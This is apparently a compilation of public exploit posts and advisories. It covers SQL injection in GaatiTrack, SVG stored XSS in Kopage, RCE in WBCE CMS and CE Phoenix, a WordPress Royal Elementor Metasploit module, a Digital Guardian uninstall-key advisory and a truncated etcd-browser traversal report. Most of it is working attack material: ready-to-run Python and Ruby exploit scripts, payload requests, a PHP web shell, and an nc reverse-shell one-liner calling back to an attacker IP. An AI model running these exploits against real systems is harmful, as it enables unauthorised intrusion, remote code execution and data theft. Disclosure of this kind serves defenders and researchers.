<pre><code># Exploit Title: GaatiTrack Courier Management System v1.0 - SQL Injection<br /># Date: 13/11/2023<br /># Exploit Author: BugsBD Limited<br /># Discover by: Rahad Chowdhury<br /># Vendor Homepage: https://www.mayurik.com/<br /># Software Link:<br />https://www.mayurik.com/source-code/P0998/best-courier-management-system-project-in-php<br /># Version: v1.0<br /># Tested on: Windows 10, PHP 8.2.4, Apache 2.4.56<br /># CVE: CVE-2023-48823<br /><br />Descriptions:<br />Blind SQL injection in ajax.php in GaatiTrack Courier Management<br />System v1.0 allows an unauthenticated attacker to insert malicious SQL<br />queries via email parameter.<br /><br /><br />Steps to Reproduce:<br /><br />1. Request:<br /><br />POST /gaatitrack/ajax.php?action=login HTTP/1.1<br />Host: 192.168.1.74<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)<br />Gecko/20100101 Firefox/119.0<br />Accept: */*<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate, br<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />X-Requested-With: XMLHttpRequest<br />Content-Length: 83<br />Origin: http://192.168.1.74<br />Connection: close<br />Referer: http://192.168.1.74/gaatitrack/login.php<br />Cookie: PHPSESSID=abl1dci7hob2f90sf5ag9k00mp;<br />KOD_SESSION_SSO=8lu85nmqbd7o912f2lldm1g08k;<br />KOD_SESSION_ID_53f4f=p7am25v0dladkuqetsqer4mdhc<br /><br />email=test%40test.com&password=123456<br /><br />2. Now use blind sqli query after email parameter. So your request data will be:<br /><br />POST /gaatitrack/ajax.php?action=login HTTP/1.1<br />Host: 192.168.1.74<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)<br />Gecko/20100101 Firefox/119.0<br />Accept: */*<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate, br<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />X-Requested-With: XMLHttpRequest<br />Content-Length: 83<br />Origin: http://192.168.1.74<br />Connection: close<br />Referer: http://192.168.1.74/gaatitrack/login.php<br />Cookie: PHPSESSID=abl1dci7hob2f90sf5ag9k00mp;<br />KOD_SESSION_SSO=8lu85nmqbd7o912f2lldm1g08k;<br />KOD_SESSION_ID_53f4f=p7am25v0dladkuqetsqer4mdhc<br /><br />email=test%40test.com'XOR(if(now()=sysdate()%2Csleep(4)%2C0))XOR'&password=123456<br /><br />## Reproduce:<br />[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48823)<br /></code></pre>
<pre><code>#Exploit Title: Kopage Website Builder version 4.4.15 – Stored Cross-Site Scripting (XSS)<br />#Date: 1/12/2023<br />#Exploit Author: tmrswrr<br />#Vendor Homepage: https://www.kopage.com/<br />#Version: Version : 4.4.15<br />#Tested on: https://demo.kopage.com/index.php<br /><br /><br />#Poc:<br /><br />1 ) Install the system through the website and log in with any user.<br />2 ) Go to Files field and click upload <br />3 ) Upload your svg file<br /><br />Payload :<br /><br /><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 500 500"><br /> <script>//<![CDATA[<br /> alert(document.domain)<br /> //]]><br /> </script><br /></svg><br /><br />4 ) Open svg file url you will be see alert button.<br /><br />Url : https://demo.kopage.com/demo/9ff16a191981a3f2ee0a7cca7/data/files/aaa.svg<br /><br /></code></pre>
<pre><code># Exploit Title: WBCE CMS Version : 1.6.1 Remote Command Execution<br /># Date: 30/11/2023<br /># Exploit Author: tmrswrr<br /># Vendor Homepage: https://wbce-cms.org/<br /># Software Link: https://github.com/WBCE/WBCE_CMS/archive/refs/tags/1.6.1.zip<br /># Version: 1.6.1<br /># Tested on: https://www.softaculous.com/apps/cms/WBCE_CMS<br /><br />## POC:<br /><br />1 ) Login with admin cred and click Add-ons<br />2 ) Click on Language > Install Language > https://demos6.softaculous.com/WBCE_CMSgn4fqnl8mv/admin/languages/index.php<br />3 ) Upload upgrade.php > <?php echo system('id'); ?> , click install > https://demos6.softaculous.com/WBCE_CMSgn4fqnl8mv/admin/languages/install.php<br />4 ) You will be see id command result <br /><br />Result: <br /><br />uid=1000(soft) gid=1000(soft) groups=1000(soft) uid=1000(soft) gid=1000(soft) groups=1000(soft) <br /><br />### Post Request:<br /><br />POST /WBCE_CMSgn4fqnl8mv/admin/languages/install.php HTTP/1.1<br />Host: demos6.softaculous.com<br />Cookie: _ga_YYDPZ3NXQQ=GS1.1.1701347353.1.1.1701349000.0.0.0; _ga=GA1.1.1562523898.1701347353; AEFCookies1526[aefsid]=jefkds0yos40w5jpbhl6ue9tsbo2yhiq; demo_390=%7B%22sid%22%3A390%2C%22adname%22%3A%22admin%22%2C%22adpass%22%3A%22pass%22%2C%22url%22%3A%22https%3A%5C%2F%5C%2Fdemos4.softaculous.com%5C%2FImpressPagesgwupshhfxk%22%2C%22adminurl%22%3A%22https%3A%5C%2F%5C%2Fdemos4.softaculous.com%5C%2FImpressPagesgwupshhfxk%5C%2Fadmin.php%22%2C%22dir_suffix%22%3A%22gwupshhfxk%22%7D; demo_549=%7B%22sid%22%3A549%2C%22adname%22%3A%22admin%22%2C%22adpass%22%3A%22password%22%2C%22url%22%3A%22https%3A%5C%2F%5C%2Fdemos1.softaculous.com%5C%2FBluditbybuxqthew%22%2C%22adminurl%22%3A%22https%3A%5C%2F%5C%2Fdemos1.softaculous.com%5C%2FBluditbybuxqthew%5C%2Fadmin%5C%2F%22%2C%22dir_suffix%22%3A%22bybuxqthew%22%7D; demo_643=%7B%22sid%22%3A643%2C%22adname%22%3A%22admin%22%2C%22adpass%22%3A%22password%22%2C%22url%22%3A%22https%3A%5C%2F%5C%2Fdemos6.softaculous.com%5C%2FWBCE_CMSgn4fqnl8mv%22%2C%22adminurl%22%3A%22https%3A%5C%2F%5C%2Fdemos6.softaculous.com%5C%2FWBCE_CMSgn4fqnl8mv%5C%2Fadmin%22%2C%22dir_suffix%22%3A%22gn4fqnl8mv%22%7D; phpsessid-5505-sid=576d8b8dd92f6cabe3a235cb359c9b34; WBCELastConnectJS=1701349503; stElem___stickySidebarElement=%5Bid%3A0%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A1%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A2%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A3%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A4%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A5%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A6%5D%5Bvalue%3AnoClass%5D%23<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Referer: https://demos6.softaculous.com/WBCE_CMSgn4fqnl8mv/admin/languages/index.php<br />Content-Type: multipart/form-data; boundary=---------------------------86020911415982314764024459<br />Content-Length: 522<br />Origin: https://demos6.softaculous.com<br />Dnt: 1<br />Upgrade-Insecure-Requests: 1<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-User: ?1<br />Te: trailers<br />Connection: close<br /><br />-----------------------------86020911415982314764024459<br />Content-Disposition: form-data; name="formtoken"<br /><br />5d3c9cef-003aaa0a62e1196ebda16a7aab9a0cf881b9370c<br />-----------------------------86020911415982314764024459<br />Content-Disposition: form-data; name="userfile"; filename="upgrade.php"<br />Content-Type: application/x-php<br /><br /><?php echo system('id'); ?><br /><br />-----------------------------86020911415982314764024459<br />Content-Disposition: form-data; name="submit"<br /><br /><br />-----------------------------86020911415982314764024459--<br /><br />### Response : <br /><br /><!-- ################### Up from here: Original Code from original template ########### --><br /><br /><!-- senseless positioning-table: needed for old modules which base on class td.content --><br /><div class="row" style="overflow:visible"><br /><div class="fg12"><br /><table id="former_positioning_table"><br /><tr><br /> <td class="content"><br />uid=1000(soft) gid=1000(soft) groups=1000(soft)<br />uid=1000(soft) gid=1000(soft) groups=1000(soft)<br /> <div class="top alertbox_error fg12 error-box"><br /> <i class=" fa fa-2x fa-warning signal"></i><br /><br /> <p>Invalid WBCE CMS language file. Please check the text file.</p><br /> <br /> <p><a href="index.php" class="button">Back<br /><br /></code></pre>
<pre><code>## Exploit Title: CE Phoenix v1.0.8.20 - Remote Code Execution (RCE) (Authenticated)<br />#### Date: 2023-11-25<br />#### Exploit Author: tmrswrr<br />#### Category: Webapps<br />#### Vendor Homepage: [CE Phoenix](https://phoenixcart.org/)<br />#### Version: v1.0.8.20<br />#### Tested on: [Softaculous Demo - CE Phoenix](https://www.softaculous.com/apps/ecommerce/CE_Phoenix)<br /><br />## EXPLOIT :<br /><br />import requests<br />from bs4 import BeautifulSoup<br />import sys<br />import urllib.parse<br />import random<br />from time import sleep<br /><br />class colors:<br /> OKBLUE = '\033[94m'<br /> WARNING = '\033[93m'<br /> FAIL = '\033[91m'<br /> ENDC = '\033[0m'<br /> BOLD = '\033[1m'<br /> UNDERLINE = '\033[4m'<br /> CBLACK = '\33[30m'<br /> CRED = '\33[31m'<br /> CGREEN = '\33[32m'<br /> CYELLOW = '\33[33m'<br /> CBLUE = '\33[34m'<br /> CVIOLET = '\33[35m'<br /> CBEIGE = '\33[36m'<br /> CWHITE = '\33[37m'<br /><br /> <br />def entry_banner():<br /> color_random = [colors.CBLUE, colors.CVIOLET, colors.CWHITE, colors.OKBLUE, colors.CGREEN, colors.WARNING,<br /> colors.CRED, colors.CBEIGE]<br /> random.shuffle(color_random)<br /><br /> banner = color_random[0] + """<br /> CE Phoenix v1.0.8.20 - Remote Code Execution \n<br /> Author: tmrswrr<br /> """<br /> for char in banner:<br /> print(char, end='')<br /> sys.stdout.flush()<br /> sleep(0.0045)<br /><br />def get_formid_and_cookies(session, url):<br /> response = session.get(url, allow_redirects=True)<br /> if response.ok:<br /> soup = BeautifulSoup(response.text, 'html.parser')<br /> formid_input = soup.find('input', {'name': 'formid'})<br /> if formid_input:<br /> return formid_input['value'], session.cookies<br /> return None, None<br /><br />def perform_exploit(session, url, username, password, command):<br /> print("\n[+] Attempting to exploit the target...")<br /><br /> <br /> initial_url = url + "/admin/define_language.php?lngdir=english&filename=english.php"<br /> formid, cookies = get_formid_and_cookies(session, initial_url)<br /> if not formid:<br /> print("[-] Failed to retrieve initial formid.")<br /> return<br /><br /> # Login<br /> print("[+] Performing login...")<br /> login_payload = {<br /> 'formid': formid,<br /> 'username': username,<br /> 'password': password<br /> }<br /> login_headers = {<br /> 'Content-Type': 'application/x-www-form-urlencoded',<br /> 'Cookie': f'cepcAdminID={cookies["cepcAdminID"]}',<br /> 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36',<br /> 'Referer': initial_url<br /> }<br /> login_url = url + "/admin/login.php?action=process"<br /> login_response = session.post(login_url, data=login_payload, headers=login_headers, allow_redirects=True)<br /><br /> if not login_response.ok:<br /> print("[-] Login failed.")<br /> print(login_response.text)<br /> return<br /><br /> print("[+] Login successful.")<br /><br /><br /> new_formid, _ = get_formid_and_cookies(session, login_response.url)<br /> if not new_formid:<br /> print("[-] Failed to retrieve new formid after login.")<br /> return<br /><br /> # Exploit<br /> print("[+] Executing the exploit...")<br /> encoded_command = urllib.parse.quote_plus(command)<br /> exploit_payload = f"formid={new_formid}&file_contents=%3C%3Fphp+echo+system%28%27{encoded_command}%27%29%3B"<br /> exploit_headers = {<br /> 'Content-Type': 'application/x-www-form-urlencoded',<br /> 'Cookie': f'cepcAdminID={cookies["cepcAdminID"]}',<br /> 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36',<br /> 'Referer': login_response.url<br /> }<br /> exploit_url = url + "/admin/define_language.php?lngdir=english&filename=english.php&action=save"<br /> exploit_response = session.post(exploit_url, data=exploit_payload, headers=exploit_headers, allow_redirects=True)<br /><br /> if exploit_response.ok:<br /> print("[+] Exploit executed successfully.")<br /> else:<br /> print("[-] Exploit failed.")<br /> print(exploit_response.text)<br /><br /> <br /> final_response = session.get(url)<br /> print("\n[+] Executed Command Output:\n")<br /> print(final_response.text) <br /><br />def main(base_url, username, password, command):<br /> print("\n[+] Starting the exploitation process...")<br /> session = requests.Session()<br /> perform_exploit(session, base_url, username, password, command)<br /><br />if __name__ == "__main__":<br /> entry_banner()<br /><br /> if len(sys.argv) < 5:<br /> print("Usage: python script.py [URL] [username] [password] [command]")<br /> sys.exit(1)<br /><br /> base_url = sys.argv[1]<br /> username = sys.argv[2]<br /> password = sys.argv[3]<br /> command = sys.argv[4]<br /><br /> main(base_url, username, password, command)<br /></code></pre>
<pre><code>#!/usr/bin/python3<br /><br /># Exploit Title: Online Student Clearance System - Unrestricted File Upload to RCE (Authenticated)<br /># Date: 28/11/2023<br /># Exploit Author: Akash Pandey aka l3v1ath0n<br /># Version: <= 1.0<br /># Tested on: Kali Linux<br /># CVE : CVE-2022-3436<br /><br />import requests<br />import time<br />import os<br /><br /><br />print("""<br /><br /> ____ ___ ____ ____ _____ _ _ _____ __ <br /> _____ _____ |___ \ / _ \___ \|___ \ |___ /| || ||___ / / /_ <br /> / __\ \ / / _ \_____ __) | | | |__) | __) |____ |_ \| || |_ |_ \| '_ \ <br />| (__ \ V / __/_____/ __/| |_| / __/ / __/_____|__) |__ _|__) | (_) |<br /> \___| \_/ \___| |_____|\___/_____|_____| |____/ |_||____/ \___/ <br /> <br />Exploit: By Akash Pandey aka l3v1ath0n, developed with ❤️:<br />Twitter: https://twitter.com/_l3v1ath0n<br />Github: https://www.github.com/1337-L3V1ATH0N/Exploit_Development/<br />""")<br /><br /><br />web_url = "http://192.168.1.26/student/" # Edit this as per your need<br />username = "18/132010" # Default Username<br />password = "11111111" # Default Password<br />local_ip = "192.168.1.6" # Edit this IP to your local Ip for reverse shell<br />local_port = "1337" # Port of local machine to connect reverse shell on...<br />rev_shell = "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc " + local_ip + " " + local_port + " >/tmp/f"<br /><br /># Firing request to login<br />log_url = web_url+"login.php"<br /><br />#Telling script to use previous session<br />session = requests.Session()<br /><br />#Post Body Data for login<br />post_data = {'txtmatric_no':username,'txtpassword':password, 'btnlogin':''}<br /><br />#Sending request to web server with required post data<br />response = session.post(log_url,data=post_data)<br /><br /># Checking Login if Successful:<br />time.sleep(1)<br /><br /># Creating a shell file in current directory<br />print("[i] Creating a shell file to upload.")<br /><br />with open("shell.php","w") as file:<br /> file.write("<?php echo shell_exec($_GET['cmd'].' 2>&1'); ?>")<br /> file.close()<br />time.sleep(1)<br /><br />print("[i] Checking Login.")<br /><br />if response.history:<br /> print("[+] Login Successful.")<br /><br /> time.sleep(1)<br /><br /> print("[i] Uploading Shell.")<br /><br /> # Step 1: Reads the shell.php file in current folder<br /> # Step 2: Stores the content in filename called shell.php<br /> # Step 3: Uses the variable name userImage to upload file to server.<br /> file = {'userImage':('shell.php',open("shell.php","rb"))}<br /> <br /> # Sending payload as POST data to shell.php file<br /> payload = {'userImage':"<?php echo shell_exec($_GET['cmd'].' 2>&1'); ?>",'btnedit':''}<br /><br /> # Uploading the malicious php file at below path using files and data values <br /> upload_response = session.post(web_url+"edit-photo.php",files=file,data=payload)<br /> print ("[TIP] Run netcat to catch reverse-shell on nc. Edit IP and Port in script")<br /> while True:<br /> command = input("l3v1ath0n㉿CVE-2022-3436: ")<br /> if command == "exit":<br /> break<br /> elif command == "netcat":<br /> print("[!] Don't forget to start Netcat Listener")<br /> time.sleep(3)<br /> payload = {'cmd':rev_shell}<br /> cmd = session.get(web_url+"uploads/shell.php?",params=payload)<br /> print(cmd.text)<br /> else:<br /> payload = {'cmd':command}<br /> cmd = session.get(web_url+"uploads/shell.php?",params=payload)<br /> print(cmd.text)<br /><br /> print("\n[i] Closing this Session")<br /> session.close()<br /><br />else:<br /> print("[-] Login Failed.")<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::Remote::HTTP::Wordpress<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'WordPress Royal Elementor Addons RCE',<br /> 'Description' => %q{<br /> Exploit for the unauthenticated file upload vulnerability in WordPress Royal Elementor Addons and Templates plugin (< 1.3.79).<br /> },<br /> 'Author' => [<br /> 'Fioravante Souza', # Vulnerability discovery<br /> 'Valentin Lobstein' # Metasploit module<br /> ],<br /> 'License' => MSF_LICENSE,<br /> 'References' => [<br /> ['CVE', '2023-5360'],<br /> ['URL', 'https://vulners.com/nuclei/NUCLEI:CVE-2023-5360'],<br /> ['WPVDB', '281518ff-7816-4007-b712-63aed7828b34']<br /> ],<br /> 'Platform' => ['unix', 'linux', 'win', 'php'],<br /> 'Arch' => [ARCH_PHP, ARCH_CMD],<br /> 'Targets' => [['Automatic', {}]],<br /> 'DisclosureDate' => '2023-11-23',<br /> 'DefaultTarget' => 0,<br /> 'DefaultOptions' => {<br /> 'SSL' => true,<br /> 'RPORT' => 443<br /> },<br /> 'Privileged' => false,<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS]<br /> }<br /> )<br /> )<br /> end<br /><br /> def check<br /> return CheckCode::Unknown unless wordpress_and_online?<br /><br /> wp_version = wordpress_version<br /> print_status("WordPress Version: #{wp_version}") if wp_version<br /><br /> check_code = check_plugin_version_from_readme('royal-elementor-addons', '1.3.79')<br /><br /> if check_code.code != 'appears'<br /> return CheckCode::Safe<br /> end<br /><br /> plugin_version = check_code.details[:version]<br /> print_good("Detected Royal Elementor Addons version: #{plugin_version}")<br /> return CheckCode::Appears<br /> end<br /><br /> def exploit<br /> print_status('Attempting to retrieve nonce...')<br /> nonce = retrieve_nonce<br /><br /> print_status('Sending payload')<br /> uri = normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php')<br /><br /> data = {<br /> 'action' => 'wpr_addons_upload_file',<br /> 'max_file_size' => rand(10001),<br /> 'allowed_file_types' => 'ph$p',<br /> 'triggering_event' => 'click',<br /> 'wpr_addons_nonce' => nonce<br /> }<br /><br /> file_content = '<?php '<br /> file_content << (payload_instance.arch.include?(ARCH_PHP) ? payload.encoded : "system(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}'));")<br /> file_content << '?>'<br /><br /> file_name = "#{Rex::Text.rand_text_alphanumeric(8)}.ph$p"<br /><br /> post_data = Rex::MIME::Message.new<br /> post_data.add_part(file_content, 'application/octet-stream', nil, "form-data; name=\"uploaded_file\"; filename=\"#{file_name}\"")<br /> data.each_pair do |key, value|<br /> post_data.add_part(value.to_s, nil, nil, "form-data; name=\"#{key}\"")<br /> end<br /><br /> res = send_request_cgi({<br /> 'uri' => uri,<br /> 'method' => 'POST',<br /> 'ctype' => "multipart/form-data; boundary=#{post_data.bound}",<br /> 'data' => post_data.to_s<br /> })<br /><br /> unless res<br /> fail_with(Failure::Unreachable, 'No response received from the target')<br /> end<br /><br /> if res.code == 200 && res.body.include?('success')<br /> print_good('Payload uploaded successfully')<br /> response_data = JSON.parse(res.body)<br /> if response_data.key?('data') && response_data['data'].key?('url')<br /> file_url = response_data['data']['url']<br /> print_status('Triggering the payload')<br /> send_request_cgi({<br /> 'uri' => file_url,<br /> 'method' => 'GET'<br /> })<br /><br /> else<br /> fail_with(Failure::UnexpectedReply, 'Payload uploaded but no URL returned in the response')<br /> end<br /> else<br /> fail_with(Failure::UnexpectedReply, 'Failed to upload the payload')<br /> end<br /> end<br /><br /> def retrieve_nonce<br /> res = send_request_cgi('uri' => normalize_uri(target_uri.path), 'method' => 'GET')<br /><br /> fail_with(Failure::Unreachable, 'No response received from the target') if res.nil?<br /> fail_with(Failure::UnexpectedReply, "Unexpected HTTP response code from the target: #{res.code}") if res.code != 200<br /><br /> match = res.body.match(/var\s+WprConfig\s*=\s*({.+?});/)<br /> fail_with(Failure::NoTarget, 'Nonce not found in the response. Is Royal Elementor Addons activated AND being used by the WordPress site being targeted?') if match.nil? || match[1].nil?<br /><br /> nonce = JSON.parse(match[1])['nonce']<br /> fail_with(Failure::NoTarget, 'Parsed a response, but the nonce value is missing') if nonce.nil?<br /><br /> print_good("Nonce found in response: #{nonce.inspect}")<br /> nonce<br /> end<br />end<br /></code></pre>
<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20231123-0 ><br />=======================================================================<br /> title: Uninstall Key Caching<br /> product: Fortra Digital Guardian Agent Uninstaller<br /> (Data Loss Prevention)<br /> vulnerable version: Agent: <7.9.4<br /> fixed version: Agent: 7.9.4<br /> CVE number: CVE-2023-6253<br /> impact: High<br /> homepage: https://www.fortra.com/product-lines/digital-guardian<br /> found: 2023-05-16<br /> by: J. Kruchem (Office Vienna)<br /> B. Gründling (Office Vienna)<br /> D. Hirschberger (Office Bochum)<br /> SEC Consult Vulnerability Lab<br /><br /> An integrated part of SEC Consult, an Eviden business<br /> Europe | Asia<br /><br /> https://www.sec-consult.com<br /><br />=======================================================================<br /><br />Vendor description:<br />-------------------<br />"Digital Guardian is proud to be part of Fortra’s comprehensive cybersecurity<br />portfolio. Fortra simplifies today’s complex cybersecurity landscape by bringing<br />complementary products together to solve problems in innovative ways. These<br />integrated, scalable solutions address the fast-changing challenges you face in<br />safeguarding your organization. With the help of the powerful protection from<br />Digital Guardian and others, Fortra is your relentless ally, here for you every<br />step of the way throughout your cybersecurity journey."<br /><br />Source: https://www.digitalguardian.com/<br /><br /><br />Business recommendation:<br />------------------------<br />SEC Consult recommends users of this platform to install the latest update.<br /><br />Furthermore, an in-depth security analysis performed by security professionals is<br />highly advised, as the software may be affected from other security issues.<br /><br /><br />Vulnerability overview/description:<br />-----------------------------------<br />1) Stored Cross-Site Scripting<br />The "PDF templates" feature is vulnerable against stored cross-site scripting<br />because it allows inserting arbitrary HTML. Therefore, an administrator can<br />create a malicious template which contains JavaScript and can send a link to<br />this template to authenticated users.<br /><br />According to the vendor, this feature works as intended and the associated risk<br />is low, hence it will not be fixed.<br /><br /><br />2) UninstallKey Cached in Memory / Installer File (CVE-2023-6253)<br />The Agent Uninstaller handles sensitive data insecurely and caches the Uninstall<br />key in memory. This key can be used to stop or uninstall the application.<br />This allows a locally authenticated attacker with administrative privileges<br />to disable the application temporarily or even remove the application from the<br />system completely.<br /><br /><br />Proof of concept:<br />-----------------<br />1) Stored Cross-Site Scripting<br />According to the vendor, this feature works as intended and the associated risk<br />is low, hence it will not be fixed.<br /><br />When editing PDF templates in the Digital Guardian Management Console (DGMC)<br />JavaScript code can be injected. By clicking on "preview" the XSS code gets<br />triggered.<br /><br />The "PDF templates" feature can be found in the System -> Configuration menu.<br />Here, a new template can be uploaded, or an existing one can be edited. To<br />exploit the issue, malicious JavaScript can be added to a template:<br /><br /><xss_insert.png><br /><br />Afterwards, the XSS is executed when the template is previewed with the<br />corresponding button:<br /><br /><xss_trigger.png><br /><br />The attacker can also send the direct link to the template to the victim:<br />https://DG_HOST/DigitalGuardian/PopUps/PDFTemplatePreview.aspx?name=XSS.htm<br /><br />If a victim opens the link while authenticated, the JavaScript code will<br />be executed.<br /><br /><br />2) UninstallKey Cached in Memory / Installer File (CVE-2023-6253)<br />When executing the installer of the DG Agent (.msi) the uninstall key is<br />pre-configured and can be read out (e.g. via Debugging).<br /><br />First, the LocalPackage registry hive was identified, which reveals the MSI<br />installation package located in the Windows directory:<br /><br /><registry.png><br /><br />The file can be executed without local administrator privileges. When executed<br />and clicked "Next", the Uninstall Key is prefilled as can be seen in the<br />following figure:<br /><br /><installer.png><br /><br />Note: For demonstration purposes and simplification of the proof of concept, the<br />provided administrative access to the management console was used to append a<br />unique string to the uninstall key so it can be found in the memory more<br />efficiently. An attacker can also find the key without this modification. For<br />this purpose, the string "sectest" was appended.<br /><br />WinDbg can be used to extract this key. WinDbg can simply be attached to the<br />process. Afterwards, the execution is paused in WinDbg and the following command<br />is used to search for the unique string:<br /> > s -u 0 L?FFFFFFFFFFFFFFFF "sectest"<br /><br />The following figure shows the output of this command (since a very large memory<br />space is searched, "Break" can be used to stop WinDbg from searching).<br /><br /><windbg_1.png><br /><br />The memory space before "sectest" needs to be viewed to show the uninstall key.<br />The command db 000001c6`165b63a8 can be used to show the memory, as can be seen<br />in the following figure:<br /><br /><windbg_2.png><br /><br />Thus, the original uninstall key is "dlpuninstall".<br /><br />Furthermore, it can be used with the Terminator.exe found in the following path:<br />"C:\Program Files\[...]\DLP"<br /><br />Running the application and supplying the key via an elevated command prompt,<br />it terminates all agent processes:<br /><br /><terminator.png><br /><br />This binary can also be used to brute-force the correct Uninstall key, by<br />repeatedly calling it with possible Uninstall key candidates:<br />\.Terminator.exe <key candidate><br /><br /><br />Vulnerable / tested versions:<br />-----------------------------<br />The following version has been tested:<br />* Management Console: 8.5.0.0317<br />* Agent: 7.8.5.0048<br /><br />The vendor confirmed that all current and previous versions are affected.<br /><br /><br />Vendor contact timeline:<br />------------------------<br />2023-06-12: Contacting vendor through email (info@fortra.com);<br /> asking for security contact, no response.<br />2023-06-26: Contacting vendor through same email again, no response.<br />2023-07-28: Contacting vendor through a more direct email-channel, no response.<br />2023-09-14: Sent another email to various email addresses found on the<br /> website. Their "security.txt" file only points to inaccessible<br /> pages (403 Access denied or 404 for the PGP key).<br />2023-09-14: Vendor response (Fortra support contact): forwarded our email to<br /> Digital Guardian support team.<br /> Support team and product security team reply.<br />2023-09-15: Asked for email encryption, received PGP key.<br />2023-09-18: Sending encrypted security advisory.<br />2023-09-19: Confirmation of receipt, team is working on verification and<br /> development.<br />2023-10-11: Asking for status update.<br /> Vendor response: XSS could be replicated but functionality works<br /> as intended and won't be fixed because of limited exposure.<br /> Issue 2 could not be verified yet, but engineering has acknowledged<br /> it as addressable. Fix is planned for Q4. All current and previous<br /> versions are affected.<br />2023-10-12: Asking for CVE number and if further input regarding vulnerability 2<br /> is needed, no response.<br />2023-10-17: Received ticket notification that next maintenance update version<br /> 7.9.4 should be available for customer testing in the near future.<br />2023-11-09: Received ticket notification that version 7.9.4 is now GA for all<br /> customers.<br />2023-11-13: Sending advisory draft to vendor, asking for CVE number for issue 2<br /> again, scheduling advisory release for next week.<br />2023-11-17: Vendor response, no CVE number yet, we will request one ourselves.<br />2023-11-23: Public release of security advisory.<br /><br /><br /><br />Solution:<br />---------<br />The vendor provides an updated Agent version 7.9.4 which can be downloaded<br />at the vendor's support page:<br />https://www.digitalguardian.com/services/support<br /><br />Access controls to the management console along with monitoring and preventive<br />controls are recommended compensating controls for issue 1 according to the vendor.<br /><br /><br />Workaround:<br />-----------<br />To prevent disclosure of the uninstall key (issue 2) change it immediately after<br />deploying the DG agent on the system.<br /><br /><br />Advisory URL:<br />-------------<br />https://sec-consult.com/vulnerability-lab/<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />SEC Consult Vulnerability Lab<br />An integrated part of SEC Consult, an Eviden business<br />Europe | Asia<br /><br />About SEC Consult Vulnerability Lab<br />The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an<br />Eviden business. It ensures the continued knowledge gain of SEC Consult in the<br />field of network and application security to stay ahead of the attacker. The<br />SEC Consult Vulnerability Lab supports high-quality penetration testing and<br />the evaluation of new offensive and defensive technologies for our customers.<br />Hence our customers obtain the most current information about vulnerabilities<br />and valid recommendation about the risk profile of new technologies.<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Interested to work with the experts of SEC Consult? Send us your application<br />https://sec-consult.com/career/<br /><br />Interested in improving your cyber security with the experts of SEC Consult?<br />Contact our local offices https://sec-consult.com/contact/<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Mail: security-research at sec-consult dot com<br />Web: https://www.sec-consult.com<br />Blog: https://blog.sec-consult.com<br />Twitter: https://twitter.com/sec_consult<br /><br />EOF J. Kruchem, B. Gründling, D. Hirschberger / @2023<br /></code></pre>
<pre><code>An issue was discovered in server.js in etcd-browser 87ae63d75260. By<br />supplying a /../../../ Directory Traversal input to the URL's GET<br />request while connecting to the remote server port specified during<br />setup, an attacker can retrieve local operating system files from the<br />remote system.<br /><br />------------------------------------------<br /><br />[Vulnerability Type]<br />Directory Traversal<br /><br />------------------------------------------<br /><br />[Vendor of Product]<br />https://hub.docker.com/r/buddho/etcd-browser<br /><br />------------------------------------------<br /><br />[Affected Product Code Base]<br />etcd-browser - Unknown<br /><br />------------------------------------------<br /><br />[Affected Component]<br />the server.js file does not validate the path for files.<br /><br />------------------------------------------<br /><br />[Attack Type]<br />Remote<br /><br />------------------------------------------<br /><br />[Impact Information Disclosure]<br />true<br /><br />------------------------------------------<br /><br />[CVE Impact Other]<br />Allow for a remote arbitrary user to obtain local operating system files<br /><br />------------------------------------------<br /><br />[Attack Vectors]<br />The attacker must supply a /../../ technique to the server application<br />running on the remote port specified during setup<br /><br />------------------------------------------<br /><br />[Reference]<br />https://hub.docker.com/r/buddho/etcd-browser<br 